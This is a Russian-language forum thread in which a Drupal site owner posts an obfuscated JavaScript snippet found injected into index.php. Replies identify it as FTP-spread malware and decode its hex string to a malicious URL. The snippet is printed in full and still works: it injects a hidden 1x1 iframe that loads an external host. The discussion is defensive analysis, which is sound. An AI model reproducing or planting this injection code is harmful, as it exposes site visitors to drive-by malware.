Странный javascript код

0

1

Недавно у себя в index.php в Друпале обнаружил странный javascript код.

<!-- . --><script type="text/javascript">function nivrZ(){var ODxCiO='QTzDlT';if('qgzC'=='ZYOyY')fuKPFL();}if('jlRv'=='kCpaks')qvBv='UJvVh';function Ayame(){}function smao(){var iOKF='BGEkXS';if('prcw'=='HQCt')QqGfI();}
var cyPkQG="pars\x65Int";if('rlxp'=='HnVdp')psEi();var JTbFBdl="\x73lice";function vgRXfZ(){var MAck='fxLz';if('ZXGGT'=='cPXc')fTHSI();}var bZFrQ='HmRBg';var APZsfNN="929e9e9a645959958b9c969395a496999e99918f9e928f9c588d9997599d5a599398588d9193695b5a";function SnUc(){var BTVhzC='zwGAB';if('emZxFI'=='WFnQR')FtDC();}
var FgNSRa="fro\x6dCharCo\x64e";var eqOti=223;if('IpmeS'=='LkpDR')cApRp='DvOgPv';var ZgCvD;function ySEir(){var mJbfa='RKBNQg';if('puIV'=='DVHJq')GvDvbb();}
var UXcClKfW="";function nZBF(){}function VJPQOK(){}
var uhyAuA=(function(){if('wfZXm'=='ISRTwP')DRnXBQ();return this;function RliJO(){}var riDo='czizo';})();if('EREg'=='lJcrdN')TwHct();function yNaWsF(){var kBRrrg='qSPl';if('xwQxHq'=='bzBMwh')xeVMz();}
var dFPOEBQ="c\x6fns\x74ru\x63t\x6fr";var UJleNT=83;var gsWih=42;var yhtxAvV="siGwwBP"[dFPOEBQ];if('AEtY'=='VmFkOS')udRBI='gJRe';if('nuYR'=='DIJGs')uIan();function USQmt(){}
for(var DQzKKpM=0;DQzKKpM<APZsfNN.length;DQzKKpM+=2){yNxrQn=uhyAuA[cyPkQG](APZsfNN[JTbFBdl](DQzKKpM,DQzKKpM+2),16)-42;UXcClKfW+=yhtxAvV[FgNSRa](yNxrQn);if('IKQekT'=='GbYrCh')sqqI();}
if('pziD'=='nCXw')wZuYGV='JRME';function AeRnG(){}if('ipReFx'=='qvAMzX')UITkS='RDoAF';var OJlEPajVV="KyMdgd";var Adsg='OKSHrl';var rqVt;var DqoGelc=navigator.appVersion.indexOf("MSIE")!=-1?'<iframe name="'+OJlEPajVV+'" src="'+"UXcClKfW"+'">':'iframe';function buFYlw(){}
var FYiEdo=document.createElement(DqoGelc);FYiEdo.name=OJlEPajVV;var VSyIt;FYiEdo.setAttribute("name",OJlEPajVV);var wPrmDD;FYiEdo.id=OJlEPajVV;FYiEdo.src=UXcClKfW;if('qyWzj'=='SHMw')SbIw();var OQQX;function GJDjAW(){var eYgo='iNKI';if('BsrM'=='fxtXFU')Kvwzhi();}
FYiEdo.style.right="0px";function lQsnU(){var jWxh='AyTbR';if('jUGmaz'=='AzRQWh')CustY();}
FYiEdo.style.top="0px";if('wdMPx'=='rtWL')WxolI();function eSlE(){}
FYiEdo.style.height="1px"
if('ejGtqC'=='RILl')VPrF();function Coanh(){}if('Lzlfhh'=='zWkr')iGDQ='TnYRGF';FYiEdo.style.width="1px";function bZYwS(){var yvZY='qAOrdx';if('umodI'=='oPJJds')yShf();}function lLjNK(){var zMCTAn='pLBu';if('JQuOJ'=='aLNz')QXljHZ();}var CuWn='SSJu';FYiEdo.style.position="absolute";var pACt=173;if('ABPWm'=='LJZPpb')Ifgw();function TWXup(){function NckY(){}
if(document.body){if('CurXr'=='alak')YWWD='jyCuRT';if('STCXW'=='JSGKKv')TAAWQu='yfede';function GrQKII(){var cMGEpk='LBsWg';if('epQd'=='himN')fLUHP();}
document.body.appendChild(FYiEdo);if('VFzZ'=='gTBGC')yKrk();if('qnOH'=='Xysp')sZmG='qjYarK';}else{var GzkLx;var QnPt;setTimeout(TWXup,100);if('SIEyek'=='eUvY')GyVKAw();}
var ysjH=104;}
if('evhht'=='HTdg')XuTNqN='ArTT';if('seVTf'=='ewkYo')Cajnt();TWXup();function cbUCDI(){var yzKbhO='qIrRxy';if('uXUVD'=='eoAE')bquJ();}var azMf=256;function WQKNr(){}</script><!-- . -->

Что это и что оно делает? Можно ли его как-то дешифровать в более человекопонятный вид? Откуда такие коды берутся и почему оно так выглядит?

Ссылка

←	[Rails] Session с ума сходит

Вставить видео с камеры RTSP

→

Бнальный вирусняк. Лет 5 назад был такой. Он ломился по ФТП всяким и заливал в *.html файлы вредоносный код.

VirRaa ★★★
(13.12.11 08:56:11 MSK)

Ссылка

почему оно так выглядит

- Почему «Ы»?"
- Чтобы никто не догадался.

вирусняк, конечно.
смотри, явно <iframe name=«'+OJlEPajVV+'» src=«'+„UXcClKfW“+'»>
и в «929e9e9a645959958b9c969395a49...» адрес

wxw ★★★★★
(13.12.11 09:28:52 MSK)

Ссылка

929e9e9a645959958b9c969395a496999e99918f9e928f9c588d9997599d5a599398588d9193695b5a = http://karlikzlotogether.com/s0/in.cgi?10

дальше сам ;)

aol ★★★★★
(13.12.11 09:54:00 MSK)

Ссылка

Нашел какашку и рассматривает «Что это такое?» ))

<Пойду посмотрю на всякий случай свой сайт>

Galant
(13.12.11 13:46:33 MSK)

Ссылка

Обычный код, пройденный обфускатором :)

xterro ★★★★★
(13.12.11 13:55:10 MSK)

Ссылка

обфусцированный xss
поимели, скорее всего украв пароль от фтп
на втором месте по вероятности - воткнули через дыру в друпале

Frakhtan-teh ★★
(13.12.11 21:43:48 MSK)

Ты небось на винде сидишь, да?

pi11 ★★★★★
(14.12.11 17:15:56 MSK)

Ссылка

Ответ на: комментарий от Frakhtan-teh 13.12.11 21:43:48 MSK

обфусцированный xss

сам ты xss

~~xtraeft~~ ★★☆☆
(14.12.11 17:18:43 MSK)

Ответ на: комментарий от xtraeft 14.12.11 17:18:43 MSK

что не так с аббревиатурой xss? ты ее не знаешь? ;)
<К.О. на марше>
это cross site scripting.
</К.О. на марше>

aol ★★★★★
(14.12.11 21:46:55 MSK)

Ответ на: комментарий от aol 14.12.11 21:46:55 MSK

Для вас, многоуважаемый школоло-кэп поясню:
XSS это тогда, когда пользователь ресурса может обойти (иногда в виду отсутствия) фильтрацию данных и встроить в код страницы вредоносный код.

А у ТСа проблема называется: я сижу на винде и у меня украли мой пасс к фтп.

winddos ★★★
(15.12.11 02:23:41 MSK)

Ссылка

Ответ на: комментарий от aol 14.12.11 21:46:55 MSK

и причем тут xss? простой слив ифрейма на сутру

~~xtraeft~~ ★★☆☆
(15.12.11 05:59:22 MSK)

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	[Rails] Session с ума сходит

Web-development

Вставить видео с камеры RTSP

→

Похожие темы